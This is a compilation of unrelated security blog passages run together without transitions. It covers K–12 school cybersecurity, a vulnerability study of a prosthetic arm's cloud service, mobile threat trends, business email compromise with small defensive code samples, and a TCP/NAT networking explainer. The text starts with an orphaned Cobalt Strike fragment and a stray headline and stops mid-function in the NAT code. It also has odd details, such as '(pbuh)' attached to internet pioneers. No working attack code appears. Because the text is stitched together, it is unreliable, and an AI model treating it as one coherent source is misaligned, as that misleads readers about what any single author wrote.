- For the ‘red team readers’ of this blog looking for ways to avoid their Cobalt Strike team server being both publicly available and easy to fingerprint, see the Cobalt Strike Team Server Population Study blog for a detailed set of mitigations. Furthermore, Red Teams are encouraged to critically examine their toolsets in use or rely on their Blue Team, for potential tell-tales and determine the appropriate way to apply and mitigate such findings for both Red and Blue team purposes.
Watch this space (pun intended) for further analysis on this subject.
Vulnerabilities affect all four major mobile carriers in the USA
Crumbling infrastructure. Gaps in curriculum. Antiquated devices. Difficult COPPA laws. Lack of funding. Those are just a few of the obstacles facing K–12 schools looking to adopt technology into their 21st century learning initiatives.
Now add security concerns to the list, and you can see why many schools struggle not only to keep up with consumer technology trends, but also protect against threats that target them.
Despite the uphill battle, schools know the importance of securing their students’ data, and many have found ways to safely incorporate cybersecurity awareness, as well as affordable technologies, to protect that data. We talked with school board members, administrators, educators, and security directors to discuss the cybersecurity challenges specific to K–12 schools (both private and public), and what can be done to overcome them.
In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. However, when we zoomed in to look at the major threats that dominated in 2018, including information-stealing Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.
In addition to K–12 school systems, key academic services, such as the SAT and ACT, are susceptible to data breaches, which can undermine the legitimacy of the college admissions process.
US schools are data-rich targets for cybercriminals, holding the names, Social Security numbers, and email addresses of students, their academic and health records, financial information, and more. According to EdWeek, US K–12 schools have experienced 425 publicly reported cybersecurity incidents since January 2016; the real number is likely much higher.
Digging into this data, presented on an interactive map from the K–12 Cybersecurity Resource Center (pictured below), schools were most impacted by data breaches (purple flags), phishing attacks (blue), and ransomware infections (yellow).
Knowing they’re a target for threat actors, which major hurdles must schools jump over in order to shore up their cybersecurity?
The first is lack of professional development. Teachers, administrators, and support staff have access to highly-confidential student data that is housed online, and because they don’t know enough about cybersecurity, they can inadvertently allow for a breach. Yet, professional development is nearly always related to changes in curriculum adoption, school events, and the occasional technology training course on how to use a particular software program or Internet-connected classroom device, such as a smart board.
In a related issue, while students are typically far more tech-savvy than their teachers, they are often not taught fundamental cybersecurity awareness at home.
“We might assume that when students get devices from home, such as phones or tablets, there are restrictions put in place or guidelines given, but very often, there are not,” said Tami Espinosa, Principal of Luigi Aprea Elementary School in Gilroy, CA. “We need to be sure to address how to properly use technology, because it is and will be such an integral part of their lives.”
Even if filters or other restrictions are put in place, many students are able to find ways around them, compromising security in the process. If they knew their actions could lead to their student records being accessed and changed, would they be so reckless?
Another challenge for shoring up cybersecurity in K–12 is a lack of funding. In a nutshell, there is none—or at least very little. What is available is usually applied directly to instruction and curriculum, as many in the school community don’t support diverting funds away from core subject areas.
“Cybersecurity isn’t a tangible item that directly impacts instruction, so many staff and community members wouldn’t support money going towards it, especially when facilities need to be fixed, curriculum needs to be purchased, and more support staff is needed,” said Tami Ortiz, a San Francisco Bay Area educator. “Cybersecurity is vital, but invisible.”
In fact, because district or federal funding often doesn’t come through for cybersecurity, schools often have to apply for grants or host fundraising events to make up the difference.
Finally, updating infrastructure is a massive obstacle for schools hoping to tighten up security. Public schools especially struggle in this area, as it’s expensive to overhaul hardware every few years, and doing so requires support staff who can manage and secure not only the devices, but also any data stored on premises or in the cloud. From operating systems to specialized educational software that needs updating, vulnerabilities are rampant and can be easily exploited—and that’s without counting negligent staff who might open an unwanted email and infect their machine.
To help persuade community members and staff to divert funds, the severity of the situation must be impressed upon them. According to The 2018 State of K–12 Cybersecurity report, nearly half of the reported breaches of the year were caused by students and staff, and 60 percent of them resulted in student data being compromised.
This tells us that awareness is a key factor in combatting breaches, but also that technologies must be deployed in order to safeguard from tech-savvy students looking to get around the protections put in place.
Doron Aronson, Vice President of the Cambrian School Board of Trustees, said that with their limited budgets, school boards look at technology holistically, with security being an important component. There are three main areas they consider when making funding decisions: infrastructure, hardware, and security; instructional practices and professional learning; and digital curriculum, tools, data and assessment. And while security is mentioned only as part of infrastructure, it can actually be incorporated into all three areas. Here’s how:
Infrastructure, hardware, and security
One of the “easiest” ways that schools can combat data breaches and other cyberattacks is by selecting and deploying cybersecurity solutions that combat threats which have historically targeted schools. IT directors should look for programs with dynamic, behavior-based detection criteria that shield from ransomware, Trojans, and other active malware families. Firewalls, supplementary email security, and encrypted data storage/backup systems provide additional coverage against breaches, phishing, and ransomware attacks.
In addition, developing a cybersecurity policy and incident response plan will help prepare schools in the event of a breach. Bonus points for incorporating a layer of security with top remediation capabilities, so that the aftermath, including restoring backups and cleaning up computers, is relatively painless.
Instructional practices and professional learning
Convince leadership to provide outsourced IT and security services, especially for professional development. Start by partnering outside trainers with those who know the most—the IT/tech department—and then move on to administration, staff, paraprofessionals, and aides.
Fresno-based educational consultant Alex Chavez advises schools to “get serious about security. Put it on the leadership meeting agenda next to school site safety. Collaborate with the outsourced security to keep up-to-date with the latest threats and best practices.”
If funding for outside awareness training is non-existent, designate or ask for a volunteer to be the cyber coordinator for the school. Look to your community for volunteers: tech-savvy younger teachers, or parents who work in technology or security would be a good place to start.
“Get some trusted outside help,” said John Donovan, Head of Security at Malwarebytes. “Designate someone on your staff to be an internal leader/point of contact, and give them some time and incentives to learn and bring that info to your school—especially if it’s a volunteer position.”
Do the same within your student body. Designate a classroom cyberhero, or select a few older students to be the cyber police for the school. Reward with extra credit, less homework, or a points system within the school for getting swag.
Once staff and volunteers have had some initial training, broaden that training out to the wider school and community by offering both formal and informal lessons, including assembly talks and workshops, and occasionally testing that knowledge through simple, fun exercises.
Digital curriculum, tools, data, and assessment
Putting the infrastructure in place, including the right antivirus software, cybersecurity policies, and support staff (volunteer or professional), plus providing professional development are steps in the right direction to shoring up cybersecurity in our elementary, middle, and high schools. However, perhaps the most important step is knowing what to teach students and teachers alike about cybersecurity hygiene, and how best to teach it.
“My advice would be to make sure there is a plan in place for the intentional teaching of cyber safety,” said Espinosa. “So often we think a lot of this is common sense, however, it is not.”
To that end, we suggest the following best practices, especially relevant to those in education:
- Install security software on all endpoints in the school environment, including mobile devices teachers may use to check their emails during the day.
- Beware of phishing emails and other social engineering, such as technical support scams or video game scams, aimed at both teachers and students. Look at the sender’s email address and be hyper-aware of attachments or links within the body of the email asking for personal information.
- Student data should be backed up and encrypted end-to-end in storage and in transmission.
- Use or create digital curriculum that is COPPA compliant.
- Use password managers for any teacher, administrator, or even student accounts.
- Keep all software and hardware updated regularly. Systems and software that have reached end of life (EOL) and are no longer supported with security updates should be purged and replaced.
How to teach it
- Incorporate cybersecurity hygiene into digital citizenship discussions, as well as digital literacy learning.
- Make cybersecurity part of curriculum that aligns to state standards for ELA or even math by assimilating knowledge about threats, hackers, or other online dangers into reading comprehension instruction, word problems, or even project-based learning activities.
- Create gamified lessons, such as phishing tests.
- Offer rewards for good cybersecurity hygiene, such as stars or points for logging out of accounts before closing browsers.
- Assign cybersecurity as a research topic for reports.
Engaging students in cybersecurity: a primer for educators
- Stop, Think, Connect (US Department of Homeland Security)
- Stay Safe Online/National Cyber Security Awareness Month (National Cyber Security Alliance)
- Privacy and Internet Safety (Common Sense Media)
- Framework for Improving Critical Infrastructure Cybersecurity (National Institute of Standards and Technology)
The IoT world has long since grown beyond the now-ubiquitous smartwatches, smartphones, smart coffee machines, cars capable of sending tweets and Facebook posts, and other stuff like fridges that send spam. Today’s IoT world boasts state-of-the-art solutions that quite literally help people. Take, for example, the biomechanical prosthetic arm made by Motorica Inc. This device helps people who have lost a limb to restore movement.
Via dedicated sensors, the biomechanical prosthetic arm reads the muscle contraction parameters and analyzes them to produce movements with the robotic fingers. The arm takes little time to get used to standard movements, after which it becomes a full-fledged assistant.
Like other IoT devices, the prosthetic arm sends statistics to the cloud, such as movement amplitudes, the arm’s positions, etc. And just like other IoT devices, this valuable invention must be checked for vulnerabilities.
In our research, we focused on those attack vectors that can be implemented without the arm owner’s knowledge. Below is a standard diagram of the arm’s interactions with the outside world.
Each arm is equipped with an embedded SIM card for sending statistical data. The SIM is needed to access the internet and send statistics and other information about the arm’s status. A connection is established to Motorica’s remote cloud, which provides an interface for remotely monitoring the status of all registered biomechanical arms. A good thing about the arm’s current architecture is that the connection between the arm and the cloud is unidirectional: only the arm sends data to the cloud, while the cloud sends nothing back. However, Motorica says it plans to implement two-way communication later.
The basic logic of the arm, such as movement directions and switching motors on or off, is implemented in the C language. The cloud for receiving, processing, and storing information is built on the following technologies:
- NodeJS – for backend,
- ReactJS – for frontend,
- MongoDB – database.
At first, we decided to attack the logic of the arm, but we soon discovered that the C code is well-structured and has no vulnerabilities in it. However, the arm that we tested has only the basic functionality. Motorica Inc. wants to add more functions to its biomechanical limbs: smartphone interconnection, contactless payments, and other useful features. From our point of view, all these new technologies must be tested for cybersecurity, especially the ones that could be exploited for MitM attacks.
Then we started to analyze the protocol used to send the statistics to the cloud and the logic for processing that information on the server. The initial findings showed that the data was sent using the insecure HTTP protocol. A little later we found some incorrect account operations and insufficient input validation that can be used by a remote attacker to:
- gain access to information about all the accounts in the cloud including the logins and passwords (in plaintext) for all the prosthetic arms and administrators,
- add or delete regular and privileged users (with administrator rights),
- launch attacks against administrators via the cloud and then attack Motorica’s internal infrastructure,
- cause a denial of service for the cloud administrator.
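The plaintext-password finding in particular has a textbook remedy: store only salted, iterated hashes and compare them in constant time. A minimal illustration of the principle in Python (Motorica’s backend is NodeJS, so this is a sketch of the approach, not their code):

```python
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes = None):
    # A fresh random salt per account defeats precomputed rainbow tables;
    # many PBKDF2 iterations slow down offline brute force.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(candidate, stored)

salt, digest = hash_password("arm-owner-passphrase")
verify_password("arm-owner-passphrase", salt, digest)  # True
verify_password("wrong guess", salt, digest)           # False
```

With a scheme like this, even a full database dump yields no usable credentials without an expensive brute-force effort per account.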
In our research we did not go deep into the data transferred between the muscle sensors and the arm itself, or study how the device interconnects with contactless payment systems or smartphones. These look like very promising research fields for the coming years.
What type of attacker might be interested in prosthetic arm data? It’s difficult to say at this moment. However, as biomechanical limbs become more intelligent, attacks will become more beneficial to their perpetrators. And once a limb is connected to a neuro-implanted brain chip, a remote attacker would gain access to something more valuable than money. In any case, all IoT devices (and especially biomechanical ones) should be tested for cybersecurity issues at every stage of development.
If you create amazing technologies that are bigger and more important than classical IoT devices, technologies that help people or even save lives, you have to check how your technology works and whether there is a chance to attack your device and harm people. To prevent basic vulnerabilities, follow secure coding best practices, implement an SDL, perform security source code reviews, appoint a security champion in your development team, and commission external vulnerability research and penetration testing. All these useful and much-needed steps will raise the cybersecurity level of your devices and technologies.
These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet, with no sign of slowing down. This is largely because smart devices make our lives easier and more enjoyable. But even though these devices are convenient for us, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.
Operations RedDawn and FoulGoal
In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.
The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.
A Virtual Backdoor
Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.
These virtual backdoors are now an ever-growing threat as hackers take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through app stores like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to mount socially engineered attacks that trick users into enabling unknown sources.
The Voice Heard Around the Home
Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.
For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.
The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:
- Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
- Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router level.
- Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
- Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.
The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.
Email scams and social engineering attacks are a huge security risk. When describing incidents in which criminals scam individuals or businesses out of money, security professionals often use terms like “CEO fraud”, “fake boss scam”, “impersonation fraud”, and “business email compromise” interchangeably for convenience. But there’s a case for treating business email compromise as a specific threat that deserves special attention.
Let’s put this into context. Phishing scams in general, and CEO fraud in particular, have the same goals: to convince you that the sender is genuine and then to trick you into doing something they want. Wombat Security’s State of the Phish 2019 report showed the scale of the risk. It surveyed almost 15,000 infosec professionals and found that almost all said the rate of phishing email incidents grew or stayed the same as last year. Last year, 83 per cent said they experienced phishing, up from 76 per cent in 2017.
The Wombat report said that attacks have one of three impacts on victims: credential compromise, malware infections and data loss. Credential compromise increased by more than 70 per cent since 2017, becoming the most commonly experienced impact in 2018. As Wombat noted, this is worrying because multiple services often sit behind a single password. Reports of data loss grew more than threefold since 2016. All three impacts have grown since 2016.
Won’t get fooled again
After analysing over a billion emails daily, Proofpoint concluded that attackers increasingly focus attention on people, rather than technical defences. “Attackers are adept at exploiting our natural curiosity, desire to be helpful, love of a good bargain, and even our time constraints to persuade us to click,” its report said.
Before scammers get to the serious business of extracting our money or making us download malware, scam emails have to pass the smell test by seeming legitimate (if it smells of ‘phish’, it probably is a ‘phish’). Most of them do this with simple spoofing techniques: misspelling the company name in a fake email domain, or amending the email address slightly so that it looks normal but replies go somewhere else. These tricks rely on people being so busy that they don’t spot the difference. The fake just needs to be good enough to fool the naked eye, and maybe also smart enough to get past a basic email gateway.
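Lookalike domains of this kind can often be caught mechanically: compare the sender’s domain against known-good domains and flag near misses. A hypothetical sketch (the helper names and trusted list are invented for illustration):

```python
def edit_distance(a: str, b: str) -> int:
    # Classic dynamic-programming Levenshtein distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def looks_spoofed(sender: str, trusted_domains: list) -> bool:
    domain = sender.rsplit("@", 1)[-1].lower()
    if domain in trusted_domains:
        return False
    # One or two characters off a trusted domain is a classic spoof.
    return any(edit_distance(domain, t) <= 2 for t in trusted_domains)

trusted = ["example.com"]
looks_spoofed("ceo@examp1e.com", trusted)  # True: '1' swapped for 'l'
looks_spoofed("ceo@example.com", trusted)  # False: exact match
```

Real email gateways combine checks like this with SPF, DKIM, and DMARC validation, but the underlying idea is the same.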
But here’s where I believe there’s a distinction with business email compromise that many people are missing. Email spoofing is one thing, but what if an attacker actually took control of your email account? Think about the impact of that for a moment. An email account is the source of so much data about a person, it’s the proverbial keys to the kingdom.
Email has all the trappings of how we “speak” virtually to our contacts, from introductions (“Dear valued customer”) to signoffs (“Best wishes, Dave”). That’s a goldmine for any attacker who wants a foolproof way of impersonating someone by copying their style and writing tone. From a business point of view, an email account also has contact details for clients and colleagues ready to hand.
A day in the life
Think of the potential damage to business relationships. How long would it take to send damaging emails to destroy your credibility, your career, or even your company? The attacker is no longer just impersonating you – as far as the email proves, they are you. And you, as the victim, might not even realise you’ve been compromised right away. An attacker who takes over your account could send stealthy emails to a manager or customer and then delete all traces of them from the ‘sent items’ folder. Imagine if they found an old message with company product plans or sales prospects; where might that end up?
And that’s not all; think for a moment how much information your email account has on all of your other activities, from utility bills to records of purchases. Email’s tentacles reach into so many parts of our digital lives.
For just about every online service we use, where do all the password resets go? That’s right, to your email account.
Password honey pot
There are two misconceptions to put right here. We might not fully value the security of our email account. We might also mistakenly assume that someone else is looking after it and keeping it secure – especially in these days of cloud services. But you know what they say about assumptions! For individual accounts, changing to a strong password, passphrase, or better yet multi-factor authentication (where something like a text message can be used to authenticate your access), will at least strengthen the protection.
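As an aside on multi-factor authentication: app-based one-time codes are generally considered stronger than SMS. The algorithm behind authenticator apps, TOTP (RFC 6238), is short enough to sketch with only the standard library:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32: str, at: float = None, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): an HMAC of the current
    30-second interval number, dynamically truncated to a short code."""
    key = base64.b32decode(secret_b32)
    counter = int((time.time() if at is None else at) // step)
    mac = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = mac[-1] & 0x0F                                 # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" at T=59s
secret = base64.b32encode(b"12345678901234567890").decode()
totp(secret, at=59, digits=8)  # "94287082"
```

Because the code depends on a shared secret and the clock, a phished password alone is useless without the second factor.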
In my experience, many companies just use cloud-based email with default settings. Instead, they should tailor the level of security to their risk. The potential impact from true business email compromise is so damaging that there is a strong argument for making companies focus attention on protecting their email above all other systems. There are plenty of security controls to help do this, from two-factor authentication to data loss prevention, and security awareness training. An attacker only has to get lucky once, as the old security saying goes. And if one finds their way in, you might as well switch off the lights on your way out.
The post More cod than phishing: why business email compromise is a bigger risk than you think appeared first on BH Consulting.
I have a very basic computer networking question: when sending a TCP packet, is the packet ACK'ed at every node in the route between the sender and the recipient, or just by the final recipient?

This isn't just a basic question, it is the basic question, the defining aspect of TCP/IP that makes the Internet different from the telephone network that predated it.
Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56 kilobits per second; using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line, consisting of 1.544 mbps, was an important standard back in the day.
In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established.
"Congestion" is important. Keep that in mind. We'll get to it a bit further down.
The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, and that it needs to reserve resources for it.
This was actually the original design of the OSI Network Layer.
Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious.
To do this, the "Open Systems Interconnection" or "OSI" group was established under the auspices of ISO, the International Organization for Standardization.
The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.
For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all the information is stripped out of the packets before they are forwarded to across the Internet.
Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information is likewise stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.
There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP will be layer 4, the "Transport Layer".
The original idea for the network layer was that it would be connection oriented, modeled after the phone system. The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.
Layer 3 also included the possibility of a connectionless network protocol, like IPv4 and IPv6, but it was assumed that connection-oriented protocols would be more popular, because that's how the phone system worked, and that was just how things were done.
The designers of the early Internet, like Bob Kahn (pbuh) and Vint Cerf (pbuh), debated this. They looked at Cyclades, a French network, which had a philosophical point of view called the end-to-end principle, by which I mean the End-To-End Principle. This principle distinguishes the Internet from the older phone system. The Internet is an independent network from the phone system, rather than an extension of the phone system like X.25.
The phone system was defined as a smart network with dumb terminals. Your home phone was a simple circuit with a few resistors, a speaker, and a microphone. It had no intelligence. All the intelligence was within the network. Unix was developed in the 1970s to run on phone switches, because it was the switches inside the network that were intelligent, not the terminals on the end. That you are now using Unix in your iPhone is the opposite of what they intended.
Even mainframe computing was designed this way. Terminals were dumb devices with just enough power to display text. All the smart processing of databases happened in huge rooms containing the mainframe.
The end-to-end principle changes this. It instead puts all the intelligence on the ends of the network, with smart terminals and smart phones. It dumbs down the switches/routers to their minimum functionality, which is to route packets individually with no knowledge of what connection they might be a part of. A router receives a packet on a link, looks at its destination IP address, and forwards it out the appropriate link in the necessary direction. Whether the packet eventually reaches its destination is of no concern to the router.
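That stateless forwarding step can be made concrete with a toy routing table in Python (the prefixes and interface names here are invented). The router picks the most specific matching route and forwards; it keeps no per-connection state at all:

```python
import ipaddress

# A stateless forwarding table: the router knows prefixes and next-hop
# interfaces, and nothing about any TCP connection.
table = {
    ipaddress.ip_network("10.0.0.0/8"): "eth1",
    ipaddress.ip_network("10.1.0.0/16"): "eth2",  # more specific route
    ipaddress.ip_network("0.0.0.0/0"): "eth0",    # default route
}

def forward(dst: str) -> str:
    addr = ipaddress.ip_address(dst)
    # Longest-prefix match: the most specific route containing the address.
    best = max((net for net in table if addr in net),
               key=lambda net: net.prefixlen)
    return table[best]

forward("10.1.2.3")   # "eth2": the /16 beats the /8
forward("10.9.9.9")   # "eth1"
forward("192.0.2.1")  # "eth0": falls through to the default route
```

Each packet is looked up independently; two packets of the same TCP connection may even take different paths.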
In the view of the telephone network, new applications meant upgrading the telephone switches, and providing the user a dumb terminal. Movies of the time, like 2001: A Space Odyssey and Blade Runner, would show video phone calls, offered by AT&T, with the Bell logo. That's because such applications were always something that the phone company would provide in the future.
With the end-to-end principle the phone company simply routes the packets, and the apps are something the user chooses separately. You make video phone calls today, but you use FaceTime, Skype, WhatsApp, Signal, and so on. My wireless carrier is AT&T, but it's absurd to think I would ever make a video phone call using an app provided to me by AT&T, as I was shown in the sci-fi movies of my youth.
So now let's talk about congestion or other errors that cause packets to be lost.
It seems obvious that the best way to deal with lost packets is at the point where it happens, to retransmit packets locally instead of all the way from the remote ends of the network.
This turns out not to be the case. Consider streaming video from Netflix. When congestion happens, Netflix wants to change the encoding of the video to a lower bit rate. You see this when watching Netflix during prime time (6pm to 11pm), when videos are of poorer quality than during other times of the day. It's streaming them at a lower bit rate because the system is overloaded.
If routers try to handle dropped packets locally, then they give limited feedback about the congestion. It would require some sort of complex signaling back to the ends of the network informing them about congestion in the middle.
With the end-to-end principle, when congestion happens, when a router can't forward a packet, it silently drops it, performing no other processing or signaling about the event. It's up to the ends to notice this. The sender doesn't receive an ACK, and after a certain period of time, resends the data. This in turn allows the app to discover congestion is happening, and to change its behavior accordingly, such as lowering the bitrate at which it's sending video.
Consider what happens with a large file download, such as your latest iOS update, which can be a gigabyte in size. How fast can the download happen? The sender has no way of knowing the available bandwidth in advance, so TCP starts transmitting slowly and keeps increasing its rate until packets get dropped, then backs off.
You can see this behavior when visiting a website like speedtest.net. You see the speed slowly increase until it reaches its maximum level. This isn't a property of the SpeedTest app, but a property of how TCP works.
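That ramp-up can be sketched with a toy model of TCP's congestion window: exponential growth ("slow start") until a loss, then back off and grow linearly. The capacity, round count, and loss rule below are illustrative, not taken from any real TCP stack.

```python
# Toy model of TCP's rate discovery. `capacity` is the (unknown to the
# sender) number of packets the path can carry per round trip.
def tcp_ramp_up(capacity=64, rounds=12):
    cwnd, ssthresh, history = 1, None, []
    for _ in range(rounds):
        history.append(cwnd)
        if cwnd > capacity:                  # a packet was dropped this round
            ssthresh = max(cwnd // 2, 1)     # remember half the failing rate
            cwnd = ssthresh                  # back off
        elif ssthresh is None or cwnd < ssthresh:
            cwnd *= 2                        # slow start: exponential growth
        else:
            cwnd += 1                        # congestion avoidance: linear
    return history

print(tcp_ramp_up())
```

The output climbs quickly, overshoots, and then oscillates around the capacity: the sawtooth you indirectly watch on a speed test.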
TCP also tracks the round trip time (RTT), the time it takes for a packet to be acknowledged. If the two ends are close, RTT should be small, and the amount of time waiting to resend a lost packet should be shorter, which means it can respond to congestion faster, and more carefully tune the proper transmit rate.
This is why buffer bloat is a problem. When a router gets overloaded, instead of dropping a packet immediately, it can instead decide to buffer the packet for a while. If the congestion is transitory, then it'll be able to send the packet a tiny bit later. Only if the congestion endures, and the buffer fills up, will it start dropping packets.
This sounds like a good idea, to improve reliability, but it messes up TCP's end-to-end behavior. It can no longer reliably measure RTT, and it can no longer detect congestion quickly and back off on how fast it's transmitting, causing congestion problems to be worse. It means that buffering in the router doesn't work, because when congestion happens, instead of backing off quickly, TCP stacks on the ends will continue to transmit at the wrong speed, filling the buffer. In many situations, buffering increases dropped packets instead of decreasing them.
Thus, the idea of trying to fix congestion in routers by adding buffers is a bad idea.
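A toy queue model makes the point concrete: buffering hides congestion from the ends by turning drops into delay, so the sender keeps transmitting and the RTT it measures inflates until the buffer overflows anyway. All numbers below are illustrative.

```python
# Each round the sender offers `offered` packets to a link that drains
# `capacity` packets per round. Excess packets sit in the buffer (up to
# `buffer_limit`), and queued packets inflate the RTT the sender sees.
def queue_delay(offered, capacity=10, buffer_limit=50, base_rtt=1.0, rounds=10):
    backlog, rtts, drops = 0, [], 0
    for _ in range(rounds):
        backlog += offered
        dropped = max(0, backlog - buffer_limit)   # buffer overflow
        drops += dropped
        backlog = min(backlog, buffer_limit)
        backlog = max(0, backlog - capacity)       # link drains the queue
        rtts.append(base_rtt * (1 + backlog / capacity))  # queueing delay
    return rtts, drops

rtts, drops = queue_delay(offered=15)
print(rtts)    # RTT climbs every round as the buffer fills
print(drops)   # drops start only once the buffer is full
```

For the first eight rounds the sender sees no drops at all, only ever-worsening RTT, which is exactly the signal-delaying behavior that breaks TCP's feedback loop.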
Routers will still do a little bit of buffering. Even on lightly loaded networks, two packets will sometimes arrive at precisely the same time, so one needs to be sent before the other. It would be insane to drop the second packet when there's plenty of bandwidth available, so routers will buffer a few packets. The solution is to reduce buffering to the minimum, but not below the minimum.
Consider Google's HTTP/3 protocol and how they are moving to UDP instead of TCP. There are various reasons for doing this, which I won't go into here. Notice that if routers insisted on being involved in the transport layer, retransmitting TCP packets locally, the HTTP/3 upgrade on the ends within the browser wouldn't work. HTTP/3 takes into consideration information that is encrypted within the protocol, something routers don't have access to.
This end-to-end decision was made back in the early 1970s, and the Internet has wildly evolved since then. Our experience 45 years later is that this decision was a good one.
Now let's discuss IPv6 and NAT.
As you know, IPv4 uses 32-bit network addresses, which have only 4-billion combinations, allowing only 4-billion devices on the Internet. However, there are more than 10-billion devices on the network currently, more than 20-billion by some estimates.
The way this is handled is network address translation or NAT. Your home router has one public IPv4 address, like 22.214.171.124. Then, internal to your home or business, you get a local private IPv4 address, likely in the range 10.x.x.x or 192.168.x.x. When you transmit packets, your local router changes the source address from the private one to the public one, and on incoming packets, changes the public address back to your private address.
It does this by tracking the TCP connection, tracking the source and destination TCP port numbers. It's really a TCP/IP translator rather than just an IP translator.
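The translation table can be sketched in a few lines of code. The addresses and port numbers below are made up (203.0.113.0/24 is a documentation range standing in for the router's public side); a real NAT also tracks TCP state and expires idle mappings.

```python
# Minimal sketch of a NAT translation table, with invented addresses.
PUBLIC_IP = "203.0.113.5"   # the router's single public IPv4 address

class Nat:
    def __init__(self):
        self.next_port = 40000
        self.out_map = {}    # (private_ip, private_port) -> public_port
        self.in_map = {}     # public_port -> (private_ip, private_port)

    def outbound(self, src_ip, src_port):
        """Rewrite an outgoing packet's source, remembering the mapping."""
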